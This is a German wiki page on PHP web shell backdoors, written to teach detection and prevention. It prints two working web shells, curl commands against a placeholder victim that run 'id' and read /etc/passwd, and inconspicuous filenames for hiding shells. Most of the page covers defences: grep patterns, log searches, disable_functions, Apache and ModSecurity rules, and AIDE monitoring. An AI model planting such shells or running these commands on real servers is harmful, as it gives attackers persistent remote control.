Thomas.will: Die Seite wurde neu angelegt: „== Web Shell Backdoors == === Beschreibung === Eine Web Shell ist eine in eine Webapplikation eingeschleuste PHP-Datei, die dem Angreifer eine ferngesteuerte…“

2026-05-31T17:17:34Z

Die Seite wurde neu angelegt: „== Web Shell Backdoors == === Beschreibung === Eine Web Shell ist eine in eine Webapplikation eingeschleuste PHP-Datei, die dem Angreifer eine ferngesteuerte…“

Neue Seite

== Web Shell Backdoors ==

=== Beschreibung ===

Eine Web Shell ist eine in eine Webapplikation eingeschleuste PHP-Datei, die dem Angreifer
eine ferngesteuerte Kommandoausführung auf dem Server ermöglicht. Sie fungiert als verstecktes
„Control Panel" – erreichbar über einen normalen HTTP-Request.

Web Shells gehören zu den häufigsten Persistenzmechanismen nach einer initialen Kompromittierung
(z. B. über eine File-Upload-Schwachstelle oder eine veraltete CMS-Installation).

=== Angreiferperspektive ===

==== Minimale Web Shell ====

<syntaxhighlight lang="php">
<?php
// Klassische One-Liner Web Shell
if (isset($_GET['cmd'])) {
system($_GET['cmd']);
}
?>
</syntaxhighlight>

Aufruf durch den Angreifer:

<syntaxhighlight lang="bash">
curl "https://opfer.example.com/images/header.php?cmd=id"
# Ausgabe: uid=33(www-data) gid=33(www-data) groups=33(www-data)

curl "https://opfer.example.com/images/header.php?cmd=cat+/etc/passwd"
</syntaxhighlight>

==== Erweiterte Web Shell mit POST-Parameter ====

<syntaxhighlight lang="php">
<?php
// Versteckt im POST-Body – schwerer in Access-Logs zu erkennen
if (isset($_POST['x'])) {
$cmd = $_POST['x'];
$output = shell_exec($cmd . ' 2>&1');
echo '<pre>' . htmlspecialchars($output) . '</pre>';
}
?>
</syntaxhighlight>

Aufruf:

<syntaxhighlight lang="bash">
curl -X POST https://opfer.example.com/wp-includes/class-wp-image.php \
-d 'x=whoami'
</syntaxhighlight>

==== Tarnung: Dateiname und Inhalt ====

Angreifer benennen Web Shells gezielt unauffällig:

<syntaxhighlight lang="bash">
/images/header.php
/wp-includes/class-wp-image.php
/cache/.thumbs.php # Punkt am Anfang → in ls ohne -a unsichtbar
/uploads/2024/img001.php
</syntaxhighlight>

=== Erkennungsmerkmale (Red Flags) ===

{| class="wikitable"
! Merkmal !! Erläuterung
|-
| <code>system()</code>, <code>exec()</code>, <code>shell_exec()</code>, <code>passthru()</code> || Direkte Ausführung von Systembefehlen
|-
| <code>$_GET</code>, <code>$_POST</code>, <code>$_REQUEST</code> ungefiltert || Benutzereingabe fließt direkt in gefährliche Funktion
|-
| Keine Authentifizierung || Jeder HTTP-Client kann die Shell aufrufen
|-
| Datei in <code>/uploads/</code>, <code>/cache/</code>, <code>/images/</code> || PHP-Code hat dort nichts zu suchen
|-
| Ungewöhnliche Zugriffszeiten im Access-Log || Requests auf selten aufgerufene PHP-Dateien, oft nachts
|}

==== Suche nach Web Shells im Dateisystem ====

<syntaxhighlight lang="bash">
# Alle PHP-Dateien mit typischen Shell-Funktionen durchsuchen
grep -rn --include="*.php" \
-e "system\s*(" \
-e "shell_exec\s*(" \
-e "exec\s*(" \
-e "passthru\s*(" \
/var/www/html/

# PHP-Dateien in Upload-Verzeichnissen – sollte leer sein
find /var/www/html/uploads -name "*.php" -type f

# Kürzlich geänderte PHP-Dateien (letzte 7 Tage)
find /var/www/html -name "*.php" -newer /var/www/html/index.php -mtime -7
</syntaxhighlight>

==== Suche im Apache Access-Log ====

<syntaxhighlight lang="bash">
# Requests mit typischen Shell-Parametern
grep -E "(cmd|exec|shell|pass|system)=" /var/log/apache2/access.log

# PHP-Aufrufe aus Upload-Verzeichnissen
grep "uploads/.*\.php" /var/log/apache2/access.log
</syntaxhighlight>

=== Gegenmaßnahmen ===

==== php.ini: Gefährliche Funktionen deaktivieren ====

<syntaxhighlight lang="ini">
; /etc/php/8.2/apache2/php.ini
disable_functions = system, exec, shell_exec, passthru, popen, proc_open,
pcntl_exec, eval
</syntaxhighlight>

Nach Änderung:

<syntaxhighlight lang="bash">
systemctl restart apache2
php -r "system('id');"
# PHP Warning: system() has been disabled for security reasons
</syntaxhighlight>

==== Apache: PHP-Ausführung in Upload-Verzeichnissen unterbinden ====

<syntaxhighlight lang="apache">
# /etc/apache2/conf-available/no-php-in-uploads.conf
<Directory /var/www/html/uploads>
php_flag engine off
# Alternativ mit mod_rewrite:
<FilesMatch "\.php$">
Require all denied
</FilesMatch>
</Directory>
</syntaxhighlight>

<syntaxhighlight lang="bash">
a2enconf no-php-in-uploads
systemctl reload apache2
</syntaxhighlight>

==== WAF-Regel (ModSecurity / Coraza) ====

<syntaxhighlight lang="apache">
# Requests mit Shell-typischen GET-Parametern blockieren
SecRule ARGS_NAMES "@rx ^(cmd|exec|command|shell|pass)$" \
"id:1001,phase:2,deny,status:403,msg:'Web Shell Parameter detected'"
</syntaxhighlight>

==== Integrity Monitoring mit AIDE ====

<syntaxhighlight lang="bash">
# AIDE-Datenbank initialisieren (nach sauberem Deployment)
aide --init
mv /var/lib/aide/aide.db.new /var/lib/aide/aide.db

# Tägliche Prüfung per Cron
echo "0 3 * * * root aide --check" >> /etc/cron.d/aide-check
</syntaxhighlight>

=== Zusammenfassung ===

;Angreifer will: Dauerhaften Remote-Zugriff auf den Server über HTTP
;Einstiegspunkt: File-Upload-Schwachstelle, kompromittiertes CMS-Plugin, gestohlene FTP-Zugangsdaten
;Persistenz: PHP-Datei in öffentlich erreichbarem Verzeichnis
;Erkennung: Grep auf Filesystem + Access-Log-Analyse + Integrity Monitoring
;Prävention: disable_functions, PHP in Uploads deaktivieren, WAF, regelmäßige Datei-Checks

[[Kategorie:Web Security]]
[[Kategorie:PHP]]
[[Kategorie:Malware]]

PHP Web Shell Backdoors - Versionsgeschichte

Thomas.will: Die Seite wurde neu angelegt: „== Web Shell Backdoors == === Beschreibung === Eine Web Shell ist eine in eine Webapplikation eingeschleuste PHP-Datei, die dem Angreifer eine ferngesteuerte…“